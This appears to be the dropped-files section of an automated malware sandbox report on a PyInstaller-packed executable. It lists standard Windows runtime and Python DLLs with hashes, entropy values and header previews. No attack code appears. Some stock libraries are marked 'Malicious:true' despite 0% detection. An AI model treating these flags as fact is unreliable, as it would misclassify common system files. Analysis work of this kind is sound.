                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......y....`.........................................`..."............ ...................A..............8............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):21784
                                                                                                                                                                                                                        Entropy (8bit):7.046057210626605
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:h81nWm5CcWEhWke9HQpBj0HRN7KQhv2kQHRN7yAXOVlTnG:hOnWm5C6DMHqWKmuk8pb
                                                                                                                                                                                                                        MD5:633DCA52DA4EBAA6F4BF268822C6DC88
                                                                                                                                                                                                                        SHA1:1EBFC0F881CE338D2F66FCC3F9C1CBB94CDC067E
                                                                                                                                                                                                                        SHA-256:424FD5D3D3297A8AB1227007EF8DED5A4F194F24BD573A5211BE71937AA55D22
                                                                                                                                                                                                                        SHA-512:ED058525EE7B4CC7E12561C7D674C26759A4301322FF0B3239F3183911CE14993614E3199D8017B9BFDE25C8CB9AC0990D318BB19F3992624B39EC0F084A8DF1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......."....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20760
                                                                                                                                                                                                                        Entropy (8bit):7.011889321604509
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:eQWEhWxFQpBj0HRN7o8/QHRN7/cPcSIlexP:eWGqWo8/8/l6B
                                                                                                                                                                                                                        MD5:43BF2037BFD3FB60E1FEDAC634C6F86E
                                                                                                                                                                                                                        SHA1:959EEBE41D905AD3AFA4254A52628EC13613CF70
                                                                                                                                                                                                                        SHA-256:735703C0597DA278AF8A6359FC051B9E657627F50AD5B486185C2EF328AD571B
                                                                                                                                                                                                                        SHA-512:7042846C009EFEA45CA5FAFDC08016ECA471A8C54486BA03F212ABBA47467F8744E9546C8F33214620F97DBCC994E3002788AD0DB65B86D8A3E4FF0D8A9D0D05
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.08402114712403
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:29DWEhWXFQpBj0HRN7lbQHRN7s8SIlexeXC:kkqWN8L6cXC
                                                                                                                                                                                                                        MD5:D51BC845C4EFBFDBD68E8CCFFDAD7375
                                                                                                                                                                                                                        SHA1:C82E580EC68C48E613C63A4C2F9974BB59182CF6
                                                                                                                                                                                                                        SHA-256:89D9F54E6C9AE1CB8F914DA1A2993A20DE588C18F1AAF4D66EFB20C3A282C866
                                                                                                                                                                                                                        SHA-512:2E353CF58AD218C3E068A345D1DA6743F488789EF7C6B96492D48571DC64DF8A71AD2DB2E5976CFD04CF4B55455E99C70C7F32BD2C0F4A8BED1D29C2DAFC17B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......].....`.........................................`...e............ ...................A..............8............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):28952
                                                                                                                                                                                                                        Entropy (8bit):6.688687241998293
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:wZVacWM4Oe59Ckb1hgmLiWEhW1e9HQpBj0HRN7O2KQHRN7w3kclsHMkZT:wZVJWMq59Bb1jQuMHqWOz8Akx
                                                                                                                                                                                                                        MD5:487F72D0CF7DC1D85FA18788A1B46813
                                                                                                                                                                                                                        SHA1:0AABFF6D4EE9A2A56D40EE61E4591D4BA7D14C0D
                                                                                                                                                                                                                        SHA-256:560BAF1B87B692C284CCBB82F2458A688757231B315B6875482E08C8F5333B3D
                                                                                                                                                                                                                        SHA-512:B7F4E32F98BFDCF799331253FAEBB1FB08EC24F638D8526F02A6D9371C8490B27D03DB3412128CED6D2BBB11604247F3F22C8380B1BF2A11FB3BB92F18980185
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........,...............................................P.......%....`.........................................`....%...........@...............0...A..............8............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20760
                                                                                                                                                                                                                        Entropy (8bit):7.028263219925353
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:JitIlWEhWO5oQpBj0HRN7BXVQHRN7DEp1x09lgezq:w6paqWz8Apsm
                                                                                                                                                                                                                        MD5:54A8FCA040976F2AAC779A344B275C80
                                                                                                                                                                                                                        SHA1:EA1F01D6DCDF688EB0F21A8CB8A38F03BC777883
                                                                                                                                                                                                                        SHA-256:7E90E7ACC69ACA4591CE421C302C7F6CDF8E44F3B4390F66EC43DFF456FFEA29
                                                                                                                                                                                                                        SHA-512:CB20BED4972E56F74DE1B7BC50DC1E27F2422DBB302AECB749018B9F88E3E4A67C9FC69BBBB8C4B21D49A530CC8266172E7D237650512AAFB293CDFE06D02228
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...x............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):24344
                                                                                                                                                                                                                        Entropy (8bit):6.897926491070706
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:B42r77WEhWCFQpBj0HRN7SQHRN7oSIlexw40:B42r7DrqWS8o6x0
                                                                                                                                                                                                                        MD5:21B509D048418922B92985696710AFCA
                                                                                                                                                                                                                        SHA1:C499DD098AAB8C7E05B8B0FD55F994472D527203
                                                                                                                                                                                                                        SHA-256:FE7336D2FB3B13A00B5B4CE055A84F0957DAEFDACE94F21B88E692E54B678AC3
                                                                                                                                                                                                                        SHA-512:C517B02D4E94CF8360D98FD093BCA25E8AE303C1B4500CF4CF01F78A7D7EF5F581B99A0371F438C6805A0B3040A0E06994BA7B541213819BD07EC8C6251CB9BB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@......~.....`.........................................`...4............0...................A..............8............................................................................rdata..H...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):25880
                                                                                                                                                                                                                        Entropy (8bit):6.843889819511554
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:z3vAmiFVhFWEhWGqQpBj0HRN79XJQHRN7/SCMllJXq:zvYjoqW958/ga
                                                                                                                                                                                                                        MD5:120A5DC2682CD2A838E0FC0EFD45506E
                                                                                                                                                                                                                        SHA1:8710BE5D5E9C878669FF8B25B67FB2DEB32CD77A
                                                                                                                                                                                                                        SHA-256:C14F0D929A761A4505628C4EB5754D81B88AA1FDAD2154A2F2B0215B983B6D89
                                                                                                                                                                                                                        SHA-512:4330EDF9B84C541E5ED3BB672548F35EFA75C6B257C3215FC29BA6E152294820347517EC9BD6BDE38411EFA9074324A276CF0D7D905ED5DD88E906D78780760C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`...a............0...............$...A..............8............................................................................rdata..t...........................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):25880
                                                                                                                                                                                                                        Entropy (8bit):6.8416401850774395
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:p5yguNvZ5VQgx3SbwA71IkFZpMHqW74W8Lipsy:p5yguNvZ5VQgx3SbwA71IipMR747fy
                                                                                                                                                                                                                        MD5:F22FACA49E4D5D80EC26ED31E7ECD0E0
                                                                                                                                                                                                                        SHA1:473BCBFB78E6A63AFD720B5CBE5C55D9495A3D88
                                                                                                                                                                                                                        SHA-256:1EB30EA95DAE91054A33A12B1C73601518D28E3746DB552D7CE120DA589D4CF4
                                                                                                                                                                                                                        SHA-512:C8090758435F02E3659D303211D78102C71754BA12B0A7E25083FD3529B3894DC3AB200B02A2899418CC6ED3B8F483D36E6C2BF86CE2A34E5FD9AD0483B73040
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`................0...............$...A..............8............................................................................rdata..............................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22296
                                                                                                                                                                                                                        Entropy (8bit):6.97368865913958
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:SPEzaWEhW/slQpBj0HRN7sVQHRN7gkclsHTyt:Y0YRqWg8jyt
                                                                                                                                                                                                                        MD5:2FD0DA47811B8ED4A0ABDF9030419381
                                                                                                                                                                                                                        SHA1:46E3F21A9BD31013A804BA45DC90CC22331A60D1
                                                                                                                                                                                                                        SHA-256:DE81C4D37833380A1C71A5401DE3AB4FE1F8856FC40D46D0165719A81D7F3924
                                                                                                                                                                                                                        SHA-512:2E6F900628809BFD908590FE1EA38E0E36960235F9A6BBCCB73BBB95C71BFD10F75E1DF5E8CF93A682E4ADA962B06C278AFC9123AB5A4117F77D1686FF683D6F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.0800725103781765
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:JBf5WEhWye9HQpBj0HRN7tKQHRN7jsAXOVlTBr:zf5dMHqWtK87U
                                                                                                                                                                                                                        MD5:FE1096F1ADE3342F049921928327F553
                                                                                                                                                                                                                        SHA1:118FB451AB006CC55F715CDF3B5E0C49CF42FBE0
                                                                                                                                                                                                                        SHA-256:88D3918E2F063553CEE283306365AA8701E60FB418F37763B4719F9974F07477
                                                                                                                                                                                                                        SHA-512:0A982046F0C93F68C03A9DD48F2BC7AEE68B9EEBEAEA01C3566B2384D0B8A231570E232168D4608A09136BCB2B1489AF802FD0C25348F743F0C1C8955EDD41C1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......0....`.........................................`...^............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):841697
                                                                                                                                                                                                                        Entropy (8bit):5.484581034394053
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                                                                        MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                                                                        SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                                                                        SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                                                                        SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\libcrypto-1_1.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3381792
                                                                                                                                                                                                                        Entropy (8bit):6.094908167946797
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                                        MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                                        SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                                        SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                                        SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\libffi-7.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32792
                                                                                                                                                                                                                        Entropy (8bit):6.372276555451265
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                                        MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                                        SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                                        SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                                        SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\python38.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4183112
                                                                                                                                                                                                                        Entropy (8bit):6.420172758698049
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                                        MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                                        SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                                        SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                                        SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\select.pyd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):26696
                                                                                                                                                                                                                        Entropy (8bit):6.101296746249305
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                                        MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                                        SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                                        SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                                        SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\ucrtbase.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1046080
                                                                                                                                                                                                                        Entropy (8bit):6.649151787942547
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                                        MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                                        SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                                        SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                                        SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\unicodedata.pyd

                                                                                                                                                                                                                        Download File
